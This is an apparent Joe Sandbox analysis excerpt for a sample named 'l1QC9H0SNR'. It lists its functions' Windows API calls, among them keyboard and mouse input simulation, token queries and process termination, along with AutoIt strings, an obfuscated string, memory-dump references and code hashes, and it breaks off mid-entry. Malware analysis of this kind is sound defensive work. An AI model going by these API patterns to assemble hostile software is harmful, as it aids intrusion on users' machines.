                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00BC4E41,?,?,00000000,00000001), ref: 00BC70AC
                                                • Part of subcall function 00BC39A0: GetWindowRect.USER32(?,?), ref: 00BC39B3
                                              • GetDesktopWindow.USER32 ref: 00BC70D6
                                              • GetWindowRect.USER32(00000000), ref: 00BC70DD
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BC710F
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              • GetCursorPos.USER32(?), ref: 00BC713B
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC7199
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                              • Instruction ID: 14b8dd306c441d4070de01a8206e67ee89597a4700b4b1520d330903d0c6ce9e
                                              • Opcode Fuzzy Hash: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                              • Instruction Fuzzy Hash: F231C472509306ABD720DF14D849FABB7E9FF88314F04095EF585A7191DB70EA09CB92
                                              Function 00BBEB23 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • _wcstok.LIBCMT ref: 00BBEC94
                                              • _wcscpy.LIBCMT ref: 00BBED23
                                              • _memset.LIBCMT ref: 00BBED56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 418e0eb40a6cac5524f8abdf77fb18aab1a83404657d081344a87459ba26ff2a
                                              • Instruction ID: 67d0dc75a47dbaf4c1cd542a69943d46c80cbc713d4ee4d5b67083b182488180
                                              • Opcode Fuzzy Hash: 418e0eb40a6cac5524f8abdf77fb18aab1a83404657d081344a87459ba26ff2a
                                              • Instruction Fuzzy Hash: B4C19271608700DFC764EF24D891AAAB7E0EF45311F0449ADF899972A1DB70EC49CB92
                                              Function 00BA8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                • Part of subcall function 00BA80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                • Part of subcall function 00BA80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                • Part of subcall function 00BA80A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00BA80E0
                                                • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                              • GetLengthSid.ADVAPI32(?,00000000,00BA842F), ref: 00BA88CA
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA88D6
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BA88DD
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA88F6
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00BA842F), ref: 00BA890A
                                              • HeapFree.KERNEL32(00000000), ref: 00BA8911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 169236558-0
                                              • Opcode ID: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                              • Instruction ID: 203ebe502f0785d35cdb45d5ffb0c1906cc150bf8c878c3a1b4829b3f3d635b0
                                              • Opcode Fuzzy Hash: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                              • Instruction Fuzzy Hash: A511A271506206FFDB109F94DC19BBFB7B8EB46311F148069E846A7110DB369E00DB60
                                              Function 00BAB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BAB7B5
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BAB7C6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BAB7CD
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BAB7D5
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BAB7EC
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00BAB7FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                              • Instruction ID: afeb44e84722435d4eb4d0c5ddeaef77f87916c628a9951d075e4f943cea4660
                                              • Opcode Fuzzy Hash: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                              • Instruction Fuzzy Hash: 84018475E05209BBEB109FA69C45E5EBFB8EB49311F0040B6FA08A7291EA709D00CF90
                                              Function 00B70162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                              • Instruction ID: 1804d7f480039527574f53bbc24694e7e5885ed3ba8313c06904336b7b48e158
                                              • Opcode Fuzzy Hash: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                              • Instruction Fuzzy Hash: 65016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                              Function 00BB53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BB53F9
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BB540F
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00BB541E
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB542D
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB5437
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB543E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                              • Instruction ID: c07c7708ed7d7451ef13a22d4ac9cad6f1b79ffe28fab458b4f8abfbf48e3292
                                              • Opcode Fuzzy Hash: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                              • Instruction Fuzzy Hash: 32F06231146159BBD7205B929C1DEFBBB7CEBC6B11F00016AF905D2050AAA05A01C6B5
                                              Function 00BB7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 00BB7243
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB7254
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00B60EE4,?,?), ref: 00BB7261
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B60EE4,?,?), ref: 00BB726E
                                                • Part of subcall function 00BB6C35: CloseHandle.KERNEL32(00000000,?,00BB727B,?,00B60EE4,?,?), ref: 00BB6C3F
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB7281
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB7288
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                              • Instruction ID: 72c8298a8768d64e399a1792c620931461bc1d53ba075f0919ca95f33c475e43
                                              • Opcode Fuzzy Hash: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                              • Instruction Fuzzy Hash: A1F05E3654A613EBDB112B64ED5CAFAB769EF45702B100572F543A20A0EFB65901CB50
                                              Function 00BC85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BC8613
                                              • CharUpperBuffW.USER32(?,?), ref: 00BC8722
                                              • VariantClear.OLEAUT32(?), ref: 00BC889A
                                                • Part of subcall function 00BB7562: VariantInit.OLEAUT32(00000000), ref: 00BB75A2
                                                • Part of subcall function 00BB7562: VariantCopy.OLEAUT32(00000000,?), ref: 00BB75AB
                                                • Part of subcall function 00BB7562: VariantClear.OLEAUT32(00000000), ref: 00BB75B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: da3d0d8eec90c04c6524677eff4d0c45f1e1af4397195abe1e232ad0798ca0f6
                                              • Instruction ID: 403c6fb07d8c3c190f8e02b73c9679427244cf13de8c9ce76bcc0865db14b3d5
                                              • Opcode Fuzzy Hash: da3d0d8eec90c04c6524677eff4d0c45f1e1af4397195abe1e232ad0798ca0f6
                                              • Instruction Fuzzy Hash: D0914D75608301DFC710DF24C485E6AB7E4EF89754F1489AEF89A8B361DB31E909CB91
                                              Function 00BB2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • _memset.LIBCMT ref: 00BB2B87
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2BB6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2C69
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BB2C97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 308ef93af66dfe93477f28803f9bfbe842c9bd3437900ba4cb8418a2ec72ea1c
                                              • Instruction ID: 73612c81f6251382197dc05823bbbc8130b4e4e6190a9e75cd17ffd4c472859b
                                              • Opcode Fuzzy Hash: 308ef93af66dfe93477f28803f9bfbe842c9bd3437900ba4cb8418a2ec72ea1c
                                              • Instruction Fuzzy Hash: 9C51BF716083019BD7249F28D845ABFBBE8EF99310F044AAEF895D7290DBB0CD44D792
                                              Function 00BAD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00BAD5D4
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BAD60A
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BAD61B
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BAD69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                              • Instruction ID: 97e2ff5268dd370ef54419e3cbd90e3cced3c6a465b3373172cacce1faca31b1
                                              • Opcode Fuzzy Hash: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                              • Instruction Fuzzy Hash: FF416CB1604205EFDF05CF68C884AAABBF9EF45310B1581E9AD0A9F615D7B1DE44CBA0
                                              Function 00BB2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB27C0
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BB27DC
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00BB2822
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C15890,00000000), ref: 00BB286B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                              • Instruction ID: 3e4d6623034b5098a32d66aa98a6b5cc475148b2caf3fbda75072e12f2b6dc7b
                                              • Opcode Fuzzy Hash: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                              • Instruction Fuzzy Hash: 3841B1702043019FD720DF24DC85BAABBE4EF85314F044AADF866972D1DBB0E905CB52
                                              Function 00BB0AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BB0B27
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BB0B43
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BB0BA9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BB0BFB
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00BB0B5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 432972143-3861665079
                                              • Opcode ID: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                              • Instruction ID: 48109fb24797549817fd45d59ea7f7cf3139a1f1ee535f7170efba4231213ccd
                                              • Opcode Fuzzy Hash: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                              • Instruction Fuzzy Hash: 98314630D64208AFFB30AB658C05BFFBBE9EB45318F0842DAE491521E1D7F58940D751
                                              Function 00BB0C11 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON
                                              Download Yara Rule
                                              APIs
